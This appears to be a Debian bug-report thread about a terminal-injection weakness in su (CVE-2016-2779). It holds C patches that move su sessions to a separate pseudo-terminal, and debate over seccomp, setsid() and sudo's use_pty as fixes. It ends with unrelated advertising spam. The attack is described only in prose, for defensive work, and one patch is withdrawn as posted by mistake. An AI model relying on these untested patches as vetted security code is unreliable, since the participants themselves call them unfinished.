+								if( tcgetattr( STDIN_FILENO, &termset_save) == -1) {
+									fprintf( stderr,
+                                             _("%s: Cannot get termios attributes: %s\n"),
+                                             Prog, strerror( errno));
+									stop = true;
+                                    errno = 0;
+								}
+								else {
+									/* Set RAW mode  */
+                                    if( term_setattr( STDIN_FILENO, &termset_save, !doshell) ==
false) {
+                                        stop = true;
+                                        errno = 0;
+                                    }
+								}
+								pg_pid_cmp = pg_pid_tmp;
+							}
 						}
-						fprintf (stderr, _("%s: Failure in writing to session\r\n"), Prog);
-						stop = true;
 					}
+
+
+					bytes_r = read( STDIN_FILENO, trbuf, BUFSIZ);
+					if( bytes_r <= 0) {
+						if( errno != EINTR && errno != EIO) {
+							fprintf( stderr,
+                                     _("%s: Failure in reading from stdin: %s\r\n"),
+                                     Prog, strerror( errno));
+						    stop = true;
+                            errno = 0;
+                        }
+					}
+
+                    while( bytes_r > 0) {
+					    ret = write( fd_ptmx, trbuf, bytes_r);
+                        if( ret < 0) {
+						    if( errno != EINTR ) {
+						        fprintf( stderr,
+                                         _("%s: Failure in writing to session: %s\r\n"),
+                                        Prog, strerror( errno));
+						        stop = true;
+                                bytes_r = 0;
+                            }
+                            errno = 0;
+                        }
+                        else
+                            bytes_r -= ret;
+                    }
 				}

 				if (FD_ISSET (fd_ptmx, &inp_fds)) {
 					bytes_r = read (fd_ptmx, trbuf, BUFSIZ);
 					if (bytes_r <= 0) {
-						if (errno == EINTR || errno == EIO) {
-							continue;
-						}
-						fprintf (stderr,
-						         _("%s: Failure in reading from session: %s\r\n"),
-						         Prog, strerror (errno));
-						stop = true;
+						if (errno != EINTR && errno != EIO) {
+						    fprintf (stderr,
+						             _("%s: Failure in reading from session: %s\r\n"),
+						             Prog, strerror (errno));
+						    stop = true;
+                            errno = 0;
+                        }
 					}

-					if (bytes_r > 0 && write (STDOUT_FILENO, trbuf, bytes_r) != bytes_r) {
-						fprintf (stderr,
-						         _("%s: Failure in writing to stdout\r\n"),
-						         Prog);
-						stop = true;
-					}
+                    while( bytes_r > 0) {
+					    ret = write( STDOUT_FILENO, trbuf, bytes_r);
+                        if( ret < 0) {
+						    if( errno != EINTR ) {
+						        fprintf( stderr,
+                                         _("%s: Failure in writing to stdout: %s\r\n"),
+                                        Prog, strerror( errno));
+						        stop = true;
+                                bytes_r = 0;
+                            }
+                            errno = 0;
+                        }
+                        else
+                            bytes_r -= ret;
+                    }
 				}
-			}
-		} while (!stop);

-		if (have_tty) {
-			(void) close (fd_pts);
-			/* Reset RAW mode  */
-			if (tcsetattr (STDIN_FILENO, TCSANOW, &termset_save) == -1) {
-				fprintf (stderr,
-				         _("%s: Cannot reset termios attributes\n"),
-				         Prog);
-				/* caught not set */
+				if( pid == (pid_t)0 && caught == 0 && stop == true)
+					caught = SIGHUP;
 			}
-		}
+		} while (!stop);
 	}

+
+    if (have_tty) {
+        (void) close (fd_pts);
+        /* Reset RAW mode  */
+        if (tcsetattr (STDIN_FILENO, TCSANOW, &termset_save) == -1) {
+            fprintf (stderr,
+                     _("%s: Cannot reset termios attributes\n"),
+                     Prog);
+        }
+    }
+
 	if (0 != caught) {
 		(void) fputs ("\n", stderr);
 		(void) fputs (_("Session terminated, terminating shell..."),
@@ -1326,7 +1454,7 @@ int main (int argc, char **argv)
 		 * Use the shell and create an argv
 		 * with the rest of the command line included.
 		 */
-		argv[-1] = cp;
+		argv[-1] = (char *)cp;
 		execve_shell (shellstr, &argv[-1], environ);
 		err = errno;
 		(void) fprintf (stderr,
___END_PATCH___



Best regards
Wolf

---

Message #181 received at 628843@bugs.debian.org (full text, mbox, reply):

Hi again,

Sorry, but I was submitting the wrong patch by mistake but
here now the right one:

___BEGIN_PATCH___
diff --git a/src/su.c b/src/su.c
index 34f6771..8053225 100644
--- a/src/su.c
+++ b/src/su.c
@@ -60,7 +60,6 @@
 #include <pwd.h>
 #include <signal.h>
 #include <stdio.h>
-#include <sys/time.h>
 #include <sys/types.h>
 #include <unistd.h>
 #include <sys/ioctl.h>
@@ -220,6 +219,46 @@ static /*@noreturn@*/void su_failure (const char *tty, bool su_to_root)
 	exit (1);
 }

+static bool term_setattr( int fd, const struct termios *termset, bool hndl_sig) {
+
+    struct termios termset_new;
+    struct termios termset_check;
+
+	termset_new = *termset;
+	/* Set RAW mode  */
+	cfmakeraw( &termset_new);
+
+	if( hndl_sig)
+	    termset_new.c_lflag = ISIG;
+
+    if( tcsetattr( fd, TCSANOW, &termset_new) == -1) {
+        fprintf( stderr,
+                 _("%s: Cannot set raw mode\n"),
+                 Prog);
+        return false;
+    }
+
+    if( tcgetattr( fd, &termset_check) == -1) {
+        fprintf( stderr,
+                 _("%s: Cannot get terminal attributes\n"),
+                 Prog);
+        return false;
+    }
+
+    if( termset_new.c_iflag != termset_check.c_iflag ||
+        termset_new.c_oflag != termset_check.c_oflag ||
+        termset_new.c_cflag != termset_check.c_cflag ||
+        termset_new.c_lflag != termset_check.c_lflag ||
+        memcmp( &termset_new.c_cc, &termset_check.c_cc, NCCS) != 0) {
+
+        fprintf( stderr,
+                 _("%s: Could not set terminal attributes correctly\n"),
+                 Prog);
+        return false;
+    }
+    return true;
+}
+
 /*
  * execve_shell - Execute a shell with execve, or interpret it with
  * /bin/sh
@@ -280,19 +319,22 @@ static void handle_session (const struct passwd *pw)
 #endif				/* USE_PAM */
 	int fd_ptmx = -1;
 	int fd_pts = -1;
-	char *pts_name = NULL;	
+	char *pts_name = NULL;
 	struct termios termset_save;
-	struct termios termset_new;
 	fd_set inp_fds;
 	struct timeval sel_to;
 	char trbuf[BUFSIZ];
 	ssize_t bytes_r;
 	struct winsize winsz;
 	bool winsz_set = false;
+	pid_t pg_pid = 0;
+	pid_t pg_pid_cmp = 0;
+	pid_t pg_pid_tmp = 0;


+	pg_pid = getpid();

-	if (isatty (0) == 1) {
+	if (isatty ( STDIN_FILENO) == 1) {
 		have_tty = true;

 		if (tcgetattr (STDIN_FILENO, &termset_save) == -1) {
@@ -360,14 +402,6 @@ static void handle_session (const struct passwd *pw)
 		if (have_tty) {
 			close (fd_ptmx);

-			if (tcsetattr (fd_pts, TCSANOW, &termset_save) == -1) {
-				fprintf (stderr,
-				         _("%s: Cannot set termios attributes of session\n"),
-				         Prog);
-				(void) close (fd_pts);
-				exit (1);
-			}
-
 			if (   winsz_set
 			    && (ioctl (fd_pts, TIOCSWINSZ, &winsz) == -1)) {
 				fprintf (stderr,
@@ -423,7 +457,7 @@ static void handle_session (const struct passwd *pw)
 		(void) fprintf (stderr,
 		                _("%s: signal malfunction\n"),
 		                Prog);
-		caught = SIGTERM;
+		caught = SIGHUP;
 	}
 	if (0 == caught) {
 		struct sigaction action;
@@ -434,31 +468,39 @@ static void handle_session (const struct passwd *pw)
 		sigemptyset (&ourset);

 		if (   (sigaddset (&ourset, SIGTERM) != 0)
+		    || (sigaddset (&ourset, SIGINT) != 0)
 		    || (sigaddset (&ourset, SIGALRM) != 0)
 		    || (sigaddset (&ourset, SIGWINCH) != 0)
+		    || (sigaddset (&ourset, SIGCONT) != 0)
+		    || (sigaddset (&ourset, SIGTSTP) != 0)
 		    || (sigaction (SIGTERM, &action, NULL) != 0)
+		    || (sigaction (SIGINT, &action, NULL) != 0)
 		    || (sigaction (SIGWINCH, &action, NULL) != 0)
-		    || (sigprocmask (SIG_UNBLOCK, &ourset, NULL) != 0)) {
+		    || (sigaction (SIGCONT, &action, NULL) != 0)
+		    || (sigaction (SIGTSTP, &action, NULL) != 0)
+		    || (sigprocmask (SIG_UNBLOCK, &ourset, NULL) != 0)
+		    ) {
 			fprintf (stderr,
 			         _("%s: signal masking malfunction\n"),
 			         Prog);
-			caught = SIGTERM;
+			caught = SIGHUP;
 		}
 	}

 	if ((0 == caught) && have_tty) {
-		/* Set RAW mode  */
-		termset_new = termset_save;
-		cfmakeraw (&termset_new);
-		if (tcsetattr (STDIN_FILENO, TCSANOW, &termset_new) != 0) {
-			/* FIXME: At least one change was successful.
-			 * Success should be checked with tcsetattr */
-			fprintf (stderr,
-			         _("%s: Cannot set terminal attributes: %s\n"),
-			         Prog, strerror (errno));
-			caught = -1;
-		}
-	}
+		if( (pg_pid_tmp = tcgetpgrp( STDIN_FILENO)) == -1) {
+			fprintf( stderr, _("%s: Cannot get process group id\n"), Prog);
+			caught = SIGHUP;
+		} else {
+			/* Set raw mode if running in foreground */
+			if( pg_pid_tmp == pg_pid) {
+				/* Set RAW mode  */
+                if( term_setattr( STDIN_FILENO, &termset_save, !doshell) == false)
+                    caught = SIGHUP;
+            }
+            pg_pid_cmp = pg_pid_tmp;
+        }
+    }

 	if (0 == caught) {
 		bool stop = true;
@@ -466,6 +508,7 @@ static void handle_session (const struct passwd *pw)
 		do {
 			pid_t pid;
 			stop = true;
+			errno = 0;

 			if (have_tty) {
 				pid = waitpid (-1, &status, WUNTRACED | WNOHANG);
@@ -473,16 +516,31 @@ static void handle_session (const struct passwd *pw)
 				pid = waitpid (-1, &status, WUNTRACED);
 			}

-			if (   ((pid_t)-1 != pid && !have_tty)
+			/* When interrupted by signal, the signal will be
+			 * forwarded to the child, and termination will be
+			 * forced later.
+			 */
+			if (   (((pid_t)-1 == pid) && (EINTR == errno) && (SIGTSTP == caught)) ||
+			        ((pid == (pid_t)0) && (SIGTSTP == caught))) {
+				/* Except for SIGTSTP, which request to
+				 * stop the child.
+				 * We will SIGSTOP ourself on the next
+				 * waitpid round.
+				 */
+				kill (pid_child, SIGSTOP);
+				stop = false;
+			} else if ( ((pid_t)0 < pid)
 			           && (0 != WIFSTOPPED (status))) {
 				/* The child (shell) was suspended.
 				 * Suspend su. */
-				kill (getpid (), WSTOPSIG (status));
+				kill (pg_pid, WSTOPSIG (status));
 				/* wake child when resumed */
 				kill (pid, SIGCONT);
 				stop = false;
-			} else if (pid == (pid_t)0 && have_tty) {
-				stop = false;
+			} else if ( pid >= (pid_t)0 && have_tty) {
+
+				if( pid == (pid_t)0)
+					stop = false;

 				if (caught == SIGWINCH) {
 					caught = 0;
@@ -491,76 +549,146 @@ static void handle_session (const struct passwd *pw)
 					}
 				}

+				/* Reset 'process group pid compare' to set STDIN to 'raw' again */
+				if( caught == SIGCONT) {
+					caught = 0;
+					pg_pid_cmp = 0;
+				}
+
+                /* Terminate the child with SIGHUP to be able
+                 * to terminate a shell running as command
+                 */
+				if( caught == SIGINT)
+					kill( -pid_child, SIGHUP);
+
+				/* If caught by any other signal then stop */
+				if( caught != 0)
+					stop = true;
+
 				FD_ZERO (&inp_fds);
 				FD_SET (STDIN_FILENO, &inp_fds);
 				FD_SET (fd_ptmx, &inp_fds);
 				sel_to = (struct timeval){ 0, 10000};

 				if (select (fd_ptmx + 1, &inp_fds, NULL, NULL, &sel_to) == -1) {
-					if (errno == EINTR) {
+					if (errno == EINTR && stop == false) {
 						continue;
 					}
 					stop = true;
+					errno = 0;
 				}
 				if (FD_ISSET (STDIN_FILENO, &inp_fds)) {
-					bytes_r = read (STDIN_FILENO, trbuf, BUFSIZ);
-					if (bytes_r <= 0) {
-						if (errno == EINTR) {
-							continue;
-						}
-						fprintf (stderr,
-						         _("%s: Failure in reading from stdin\r\n"),
-						         Prog);
+					/* Get process group pid to compare with last run */
+					if ( (pg_pid_tmp = tcgetpgrp( STDIN_FILENO)) == -1) {
+						fprintf( stderr,
+						         _("%s: Cannot get process group id: %s\n"),
+						         Prog, strerror( errno));
 						stop = true;
+                        errno = 0;
 					}
-
-					if (   (bytes_r > 0)
-					    && (write (fd_ptmx, trbuf, bytes_r) != bytes_r)) {
-						if (errno == EINTR || errno == EIO) {
-							/* FIXME: are we
-							 * loosing some
-							 * bytes here? */
-							continue;
+					else {
+						
+						/* Running in foreground  if equal */
+						if( pg_pid_tmp == pg_pid) {
+
+							/* Set raw mode again if last run was in background */
+							if( pg_pid_cmp != pg_pid_tmp) {
+
+								/* Fetch term settings again because parent might have changed settings */
+								if( tcgetattr( STDIN_FILENO, &termset_save) == -1) {
+									fprintf( stderr,
+                                             _("%s: Cannot get termios attributes: %s\n"),
+                                             Prog, strerror( errno));
+									stop = true;
+                                    errno = 0;
+								}
+								else {
+									/* Set RAW mode  */
+                                    if( term_setattr( STDIN_FILENO, &termset_save, !doshell) ==
false) {
+                                        stop = true;
+                                        errno = 0;
+                                    }
+								}
+								pg_pid_cmp = pg_pid_tmp;
+							}
 						}
-						fprintf (stderr, _("%s: Failure in writing to session\r\n"), Prog);
-						stop = true;
 					}
+
+
+					bytes_r = read( STDIN_FILENO, trbuf, BUFSIZ);
+					if( bytes_r <= 0) {
+						if( errno != EINTR && errno != EIO && errno != 0) {
+							fprintf( stderr,
+                                     _("%s: Failure in reading from stdin: %s\r\n"),
+                                     Prog, strerror( errno));
+						    stop = true;
+                            errno = 0;
+                        }
+					}
+
+                    while( bytes_r > 0) {
+					    ret = write( fd_ptmx, trbuf, bytes_r);
+                        if( ret < 0) {
+						    if( errno != EINTR && errno != 0) {
+						        fprintf( stderr,
+                                         _("%s: Failure in writing to session: %s\r\n"),
+                                        Prog, strerror( errno));
+						        stop = true;
+                                bytes_r = 0;
+                            }
+                            errno = 0;
+                        }
+                        else
+                            bytes_r -= ret;
+                    }
 				}

 				if (FD_ISSET (fd_ptmx, &inp_fds)) {
 					bytes_r = read (fd_ptmx, trbuf, BUFSIZ);
 					if (bytes_r <= 0) {
-						if (errno == EINTR || errno == EIO) {
-							continue;
-						}
-						fprintf (stderr,
-						         _("%s: Failure in reading from session: %s\r\n"),
-						         Prog, strerror (errno));
-						stop = true;
+						if (errno != EINTR && errno != EIO && errno != 0) {
+						    fprintf (stderr,
+						             _("%s: Failure in reading from session: %s\r\n"),
+						             Prog, strerror (errno));
+						    stop = true;
+                            errno = 0;
+                        }
 					}

-					if (bytes_r > 0 && write (STDOUT_FILENO, trbuf, bytes_r) != bytes_r) {
-						fprintf (stderr,
-						         _("%s: Failure in writing to stdout\r\n"),
-						         Prog);
-						stop = true;
-					}
___END_PATCH___



Best regards
Wolf

---

Message #186 received at 628843@bugs.debian.org (full text, mbox, reply):

I agree that simply crippling su -c is a very troubling 'solution' to this problem.  Obviously anyone can close a problem by simply crippling the program.

Bugs from so-called 'fixes' related to this in shadow are now appearing in my file manager, this one from a Slackware user:
https://github.com/IgnorantGuru/spacefm/issues/394

su doesn't even return an error message there, it silently ignores the -c command, making troubleshooting difficult.  In this case, the SpaceFM file manager allows the user to run quick commands as root, open a root terminal, etc.  The user selects the su front-end to use, such as su in a terminal, gksu, kdesu, etc.  All of these front-ends support running a command, and the shadow 4.1.5  'fix' seems to break all of them in some circumstances (without PAM?)  In that case, Slackware users are encountering it when KDE is not installed.
http://seclists.org/oss-sec/2013/q2/374

Thus far I have not seen a problem in Debian on this, and I hope Debian takes a more reasonable approach.  Red Hat is very heavy-handed in their so-called fixes and they cause widespread breakage (eg udev, etc).  Hardly a good example to follow.

I'm not following all the technical details here, but in your rush to close a hole, be mindful not to cause such breakage.  There aren't a lot of alternatives to su.  su is less secure by nature and we all know this - you assume some risk by using it.  Yet simply removing the functionality is not a viable solution.  The approach to this is not considering all use cases of the widely-used su program and the implications of merely crippling it.

Thanks for considering this carefully.  I think if you don't you're opening a pandora's box of more issues.

---

Message #191 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

[WU.tif (image/tiff, attachment)]

---

Message #196 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

Package: login
Version: 1:4.2-3+deb8u1
Followup-For: Bug #628843

Hello,

Any news on this?

I'm deeply worried that this security issue in su was not fixed
since it was reported over 5 years ago! It still affects jessie
and sid. And the possible implications are not mentioned in the
man page.

As this breaks the use of su to change to less-privileged users,
what is the recommendation to perform this task without using su?

Regards
Simon
-- 
+ privacy is necessary
+ using gnupg http://gnupg.org
+ public key id: 0x1972F726F0D556E7

[signature.asc (application/pgp-signature, inline)]

---

Message #201 received at 628843@bugs.debian.org (full text, mbox, reply):

Hello Simon,

This has been recently patched by using seccomp to blacklist this ioctl.

https://github.com/karelzak/util-linux/commit/8e4925016875c6a4f2ab4f833ba66f0fc57396a2

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

---

Message #206 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

On Sun, Oct 02, 2016 at 10:54:06AM +0200, up201407890@alunos.dcc.fc.up.pt wrote:
> Hello Simon,
>
> This has been recently patched by using seccomp to blacklist this ioctl.
>
> https://github.com/karelzak/util-linux/commit/8e4925016875c6a4f2ab4f833ba66f0fc57396a2

Hello,

This is an awful hack! Blacklisting this single ioctl will fix
only this specific issue, but the underlying problem, that the
unprivileged user has access to the original tty, is still
unfixed.

The (later) patches in this bug report go in a different
direction and fix the underlying problem by opening a new session
with a separate tty and "proxying" the output (SSH also uses this
approach - only over the network). This seems to me like a much
better option than blacklisting a single ioctl.

@Karel: Could you please have a look at the patches in this bug
report which use setsid() to create a new session and adapt your
commit with a patch based on this approach? Sudo's use_pty option
does the same to fix this issue (but not enabled by default).

Regards
Simon
-- 
+ privacy is necessary
+ using gnupg http://gnupg.org
+ public key id: 0x92FEFDB7E44C32F9

[signature.asc (application/pgp-signature, inline)]

---

Message #211 received at 628843@bugs.debian.org (full text, mbox, reply):

Quoting "Simon Ruderich" <simon@ruderich.org>:

Btw, at least in redhat based systems, su uses setsid() when the -c  
option is given, just like use_pty in sudo. Not sure if this is true  
in debian.

> On Sun, Oct 02, 2016 at 10:54:06AM +0200,  
> up201407890@alunos.dcc.fc.up.pt wrote:
>> Hello Simon,
>>
>> This has been recently patched by using seccomp to blacklist this ioctl.
>>
>> https://github.com/karelzak/util-linux/commit/8e4925016875c6a4f2ab4f833ba66f0fc57396a2
>
> Hello,
>
> This is an awful hack! Blacklisting this single ioctl will fix
> only this specific issue, but the underlying problem, that the
> unprivileged user has access to the original tty, is still
> unfixed.
>
> The (later) patches in this bug report go in a different
> direction and fix the underlying problem by opening a new session
> with a separate tty and "proxying" the output (SSH also uses this
> approach - only over the network). This seems to me like a much
> better option than blacklisting a single ioctl.
>
> @Karel: Could you please have a look at the patches in this bug
> report which use setsid() to create a new session and adapt your
> commit with a patch based on this approach? Sudo's use_pty option
> does the same to fix this issue (but not enabled by default).
>
> Regards
> Simon
> --
> + privacy is necessary
> + using gnupg http://gnupg.org
> + public key id: 0x92FEFDB7E44C32F9
>



----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

---

Message #216 received at 628843@bugs.debian.org (full text, mbox, reply):

On Mon, Oct 03, 2016 at 04:11:41PM +0200, up201407890@alunos.dcc.fc.up.pt wrote:
> Quoting "Simon Ruderich" <simon@ruderich.org>:
> 
> Btw, at least in redhat based systems, su uses setsid() when the -c option
> is given, just like use_pty in sudo. Not sure if this is true in debian.

The problem is that we don't want to use setsid() in all situations,
because it will introduce regressions. From util-linux ReleaseNotes:

 CVE-2016-2779
 
 This security issue is NOT FIXED yet.  It is possible to disable the
 ioctl TIOCSTI by setsid() only.  Unfortunately, setsid() has
 well-defined use cases in su(1) and runuser(1) and any changes would
 introduce regressions.  It seems we need a better way -- ideally
 another ioctl (or whatever is supported by the kernel) to disable
 TIOCSTI without setsid().

and yes, blacklisting ioctl is hack.

    Karel

-- 
 Karel Zak  <kzak@redhat.com>
 http://karelzak.blogspot.com

---

Message #221 received at 628843@bugs.debian.org (full text, mbox, reply):

On Mon, Oct 03, 2016 at 03:34:49PM +0200, Simon Ruderich wrote:
> @Karel: Could you please have a look at the patches in this bug
> report which use setsid() to create a new session and adapt your
> commit with a patch based on this approach? Sudo's use_pty option
> does the same to fix this issue (but not enabled by default).

I'll think about it.

    Karel

-- 
 Karel Zak  <kzak@redhat.com>
 http://karelzak.blogspot.com

---

Message #226 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

On Mon, Oct 03, 2016 at 04:22:47PM +0200, Karel Zak wrote:
> The problem is that we don't want to use setsid() in all situations,
> because it will introduce regressions. From util-linux ReleaseNotes:

Hello,

Thanks for your quick reply.

In which situations will this cause regressions? I tried to find
cases where this will break, but I can't think of any (I guess
that's because I'm just using su in a very basic way).

Regards
Simon
-- 
+ privacy is necessary
+ using gnupg http://gnupg.org
+ public key id: 0x92FEFDB7E44C32F9

[signature.asc (application/pgp-signature, inline)]

---

Message #231 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

On Mon, Oct 03, 2016 at 04:11:41PM +0200, up201407890@alunos.dcc.fc.up.pt wrote:
> Btw, at least in redhat based systems, su uses setsid() when the -c option
> is given, just like use_pty in sudo. Not sure if this is true in debian.

Yes, that's true in Debian as well.

Regards
Simon
-- 
+ privacy is necessary
+ using gnupg http://gnupg.org
+ public key id: 0x92FEFDB7E44C32F9

[signature.asc (application/pgp-signature, inline)]

---

Message #236 received at 628843@bugs.debian.org (full text, mbox, reply):

Quoting "Simon Ruderich" <simon@ruderich.org>:

Loss of job control in the shell.

> On Mon, Oct 03, 2016 at 04:22:47PM +0200, Karel Zak wrote:
>> The problem is that we don't want to use setsid() in all situations,
>> because it will introduce regressions. From util-linux ReleaseNotes:
>
> Hello,
>
> Thanks for your quick reply.
>
> In which situations will this cause regressions? I tried to find
> cases where this will break, but I can't think of any (I guess
> that's because I'm just using su in a very basic way).
>
> Regards
> Simon
> --
> + privacy is necessary
> + using gnupg http://gnupg.org
> + public key id: 0x92FEFDB7E44C32F9
>



----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

---

Message #241 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

On Mon, Oct 03, 2016 at 09:22:50PM +0200, up201407890@alunos.dcc.fc.up.pt wrote:
> Loss of job control in the shell.

I'm confused. I'm not talking about removing the controlling
terminal, but instead spawning a new session, opening a new pts
and connecting that to the program. This way the program has a
tty, job control works, but the tty is different and therefore
can't be controlled by the less-privileged account.

Regards
Simon
-- 
+ privacy is necessary
+ using gnupg http://gnupg.org
+ public key id: 0x92FEFDB7E44C32F9

[signature.asc (application/pgp-signature, inline)]

---

Message #246 received at 628843@bugs.debian.org (full text, mbox, reply):

On Mon, Oct 03, 2016 at 09:34:14PM +0200, Simon Ruderich wrote:
> On Mon, Oct 03, 2016 at 09:22:50PM +0200, up201407890@alunos.dcc.fc.up.pt wrote:
> > Loss of job control in the shell.
> 
> I'm confused. I'm not talking about removing the controlling
> terminal, but instead spawning a new session, opening a new pts
> and connecting that to the program. This way the program has a
> tty, job control works, but the tty is different and therefore
> can't be controlled by the less-privileged account.

Yes, I'm thinking about this way (as discussed on util-linux
mailing list), but it's relatively complex.

My plan is to try to implement it. We will see.

    Karel

-- 
 Karel Zak  <kzak@redhat.com>
 http://karelzak.blogspot.com

---

Message #251 received at 628843@bugs.debian.org (full text, mbox, reply):

Quoting "Karel Zak" <kzak@redhat.com>:

Anyways, it is bad admin practice and/or an invasion of privacy to su  
to an unprivileged user.

This has been talked alot in the past, in most of the times even  
closed as "WONTFIX".

What I'm saying is, it's OK if you can't come up with something.  
Better use 'su -c' in any case.

> On Mon, Oct 03, 2016 at 09:34:14PM +0200, Simon Ruderich wrote:
>> On Mon, Oct 03, 2016 at 09:22:50PM +0200,  
>> up201407890@alunos.dcc.fc.up.pt wrote:
>> > Loss of job control in the shell.
>>
>> I'm confused. I'm not talking about removing the controlling
>> terminal, but instead spawning a new session, opening a new pts
>> and connecting that to the program. This way the program has a
>> tty, job control works, but the tty is different and therefore
>> can't be controlled by the less-privileged account.
>
> Yes, I'm thinking about this way (as discussed on util-linux
> mailing list), but it's relatively complex.
>
> My plan is to try to implement it. We will see.
>
>     Karel
>
> --
>  Karel Zak  <kzak@redhat.com>
>  http://karelzak.blogspot.com
>



----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

---

Message #256 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

On Mon, Oct 03, 2016 at 09:58:23PM +0200, up201407890@alunos.dcc.fc.up.pt wrote:
> Anyways, it is bad admin practice and/or an invasion of privacy to su to an
> unprivileged user.

Please explain to me why this is bad admin practice.

Lets assume I have an unprivileged user which is used to execute
a script in an isolated context. Now that script breaks and I
have to debug it. The user has no shell nor password. How do I
run a command as that user? What I did in the past was to run su
-s /bin/sh user and then debug and fix the problem. What is wrong
with that setup?

> This has been talked alot in the past, in most of the times even closed as
> "WONTFIX".

In that case su should prevent a user from doing it, not causing
a security hole and not documenting that fact.

> What I'm saying is, it's OK if you can't come up with something. Better use
> 'su -c' in any case.

Often a terminal with a shell makes debugging much less painful.
su -c doesn't help there.

Regards
Simon
-- 
+ privacy is necessary
+ using gnupg http://gnupg.org
+ public key id: 0x92FEFDB7E44C32F9

[signature.asc (application/pgp-signature, inline)]

---

Message #261 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

On Mon, Oct 03, 2016 at 09:49:08PM +0200, Karel Zak wrote:
> Yes, I'm thinking about this way (as discussed on util-linux
> mailing list), but it's relatively complex.

I have a working solution here. It's a standalone program and not
very well tested, but works fine for me. Just tell me if you want
to get the source. (Disclaimer: I'm no terminal expert, so be
careful with trusting it too much.)

This bug also has some patches which implement exactly that and
may just need a little refinement.

Regards
Simon
-- 
+ privacy is necessary
+ using gnupg http://gnupg.org
+ public key id: 0x92FEFDB7E44C32F9

[signature.asc (application/pgp-signature, inline)]

---

Message #266 received at 628843@bugs.debian.org (full text, mbox, reply):

Quoting "Simon Ruderich" <simon@ruderich.org>:

It's an invasion of privacy, as I said, for normal users.

In your case, if you're changing to an unprivileged user without a  
shell nor password, probably some sort of "locked" account, how is an  
attacker going to make use of TIOCSTI to exploit your system?  
(Assuming you're not going to run untrusted applications).

Now imagine that that locked user got compromised. Changing to a  
compromised user IS and will ALWAYS be bad practice. So, if you don't  
know if the user is compromised or not, don't log into that account,  
as simple as that. All sorts of bad things can happen.

Just my 2 cents.

> On Mon, Oct 03, 2016 at 09:58:23PM +0200,  
> up201407890@alunos.dcc.fc.up.pt wrote:
>> Anyways, it is bad admin practice and/or an invasion of privacy to su to an
>> unprivileged user.
>
> Please explain to me why this is bad admin practice.
>
> Lets assume I have an unprivileged user which is used to execute
> a script in an isolated context. Now that script breaks and I
> have to debug it. The user has no shell nor password. How do I
> run a command as that user? What I did in the past was to run su
> -s /bin/sh user and then debug and fix the problem. What is wrong
> with that setup?
>
>> This has been talked alot in the past, in most of the times even closed as
>> "WONTFIX".
>
> In that case su should prevent a user from doing it, not causing
> a security hole and not documenting that fact.
>
>> What I'm saying is, it's OK if you can't come up with something. Better use
>> 'su -c' in any case.
>
> Often a terminal with a shell makes debugging much less painful.
> su -c doesn't help there.
>
> Regards
> Simon
> --
> + privacy is necessary
> + using gnupg http://gnupg.org
> + public key id: 0x92FEFDB7E44C32F9
>



----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

---

Message #271 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

On Mon, Oct 03, 2016 at 11:07:59PM +0200, up201407890@alunos.dcc.fc.up.pt wrote:
> It's an invasion of privacy, as I said, for normal users.

Sure, but that's not my use case.

> In your case, if you're changing to an unprivileged user without a shell nor
> password, probably some sort of "locked" account, how is an attacker going
> to make use of TIOCSTI to exploit your system? (Assuming you're not going to
> run untrusted applications).
>
> Now imagine that that locked user got compromised. Changing to a compromised
> user IS and will ALWAYS be bad practice. So, if you don't know if the user
> is compromised or not, don't log into that account, as simple as that. All
> sorts of bad things can happen.

I see your point.

But there's always a trade-off between security and usability.
And logging in as a (possibly compromised) user makes working
with user separation much easier and should still be as secure as
possible (that's why I want to fix su and sudo). I know an
attacker could exploit my terminal emulator when I log in, but
it's better than no isolation at all IMHO.

Anyway, this is off-topic, so let's take this off-list if you
want to discuss it further.

Regards
Simon
-- 
+ privacy is necessary
+ using gnupg http://gnupg.org
+ public key id: 0x92FEFDB7E44C32F9

[signature.asc (application/pgp-signature, inline)]

---

Message #276 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

Hola.

-- 
Atentamente

                  Salomón Polanco

[Message part 2 (text/html, inline)]

---

Message #283 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

Boletin
 
									 
								Soluciones Gerenciales le Invita a nuestra Certificación: Especialista en Planilla
									 
												
											Teléfonos:507- 3985092 sino logra ser atendido puede llamar también al 507-8335786
											Marcar como SPAM
											 
											 
															 
															Próximos Eventos
															 
														
											 
											 
															 
															Talleres Incompany
															 
														
											 
											
								 
									 
								
					
		 
		 
					 
															
															Reservar en Panamá (Presencial)
															 
														
											 
											Certificación:
											 
											Especialista en Planilla
											 
											 
												
											 
											 
														Obtén la herramientas necesarias para ser un especialista en planilla
														 
														
											 
											
								
					
		 
		Contenido del Evento
								
									
									MODULO 1: INTENSIVO PARA PLANILLEROS
										Fecha: 21-07-2017 y 22-07-2017
Horario: 16 horas academicas (1:30 pm a 6:30 pm)
										Rose Molina
										
										Contenido:

										1. Concepto de salario para Mitradel, CSS 

										2. Normas protectoras de Salario según el Código de trabajo

										3. Régimen de seguridad social

										4. El Contrato de Trabajo.

										5. Salario Mínimo.

										6. Descuentos y Retenciones permitidas sobre el salario.

										7. Incapacidades, Ausencias y Permisos.

										8. Calculo de Horas Extras

										9. Liquidaciones Laborales

										10. Introducción a SIPE

										 

										Armando Avendaño

										Aplicación Correcta del código de Trabajo

										Contenido:

										1. La Relación De Trabajo. 

										2. Los Sujetos De La Relación De Trabajo. 

										3. El Contrato De Trabajo. 

										3.1. Características Principales. 

										-dependencia Económica. 

										-subordinación Jurídica. 

										4. Por qué debemos celebrar un contrato de trabajo. 

										5. Tipos De Contratos. 

